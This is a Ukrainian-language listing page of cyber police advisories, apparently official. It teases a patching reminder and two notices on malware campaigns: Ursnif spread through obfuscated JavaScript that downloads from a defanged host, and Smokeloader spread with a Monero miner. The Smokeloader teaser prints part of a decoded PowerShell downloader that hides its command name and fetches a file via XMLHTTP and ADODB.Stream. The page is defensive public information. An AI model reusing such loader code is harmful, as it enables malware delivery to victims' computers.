Категорія: Рекомендації

Кві 14

Департамент кіберполіції інформує про мережеві атаки

Департамент кіберполіції на постійній основі систематично проводить роз’яснювальну роботу серед населення щодо важливості вживання заходів забезпечення належного рівня захищеності інформаційних систем та їх елементів. Зокрема, постійно акцентується увага на необхідності регулярних оновлень програмного забезпечення, особливо такого, яке має безпосередній доступ до мережі Інтернет. Однак, на превеликий жаль, багато хто нехтує елементарними правилами кібербезпеки та порадами, які надаються кіберполіцією. Це призводить Читати далі…

0
Бер 31

Поширення банківського трояна Ursnif

Приклад повідомлень : У вкладеному архіві anketa_21_3_2018 (4).zip міститься шкідливий Javascript: anketa_21_3_2018 (4).js. Також, було виявлено поширення повідомлень з таким Javascript, але, вкладених в архів documents (5).zip з назвою шкідливого Javascipt documents (5).js відповідно. Сам Javascript складно обфускований, в декілька етапів. В результаті аналізу встановлено, що Javascript за допомогою ADODB.Stream записує потік даних з сайту hxxp://chernilis.win/filename94.bin?ff1 у виконуваний файл за Читати далі…

0
Бер 03

Поширення Monero Mining, через Smokeloader

Виявлено факт поширення шкідливого програмного забезпечення Smokeloader, який скачував на комп’ютери жертв програму для майнингу криптовалюти Monero. Поширення Smokeloader відбувається через розсилку поштових повідомлень зі злоякісним Javascript-ом. В самому Javascript шкідливий код зашифрований в виді Base64 і при розшифруванні виглядає так: cmd /k set _a1=pow&& set _a2=ersh&& set _a3=ell&& call %_a1%%_a2%%_a3% $http_request = New-Object -ComObject Msxml2.XMLHTTP;$adodb = New-Object -ComObjectADODB.Stream; $path = Читати далі…

0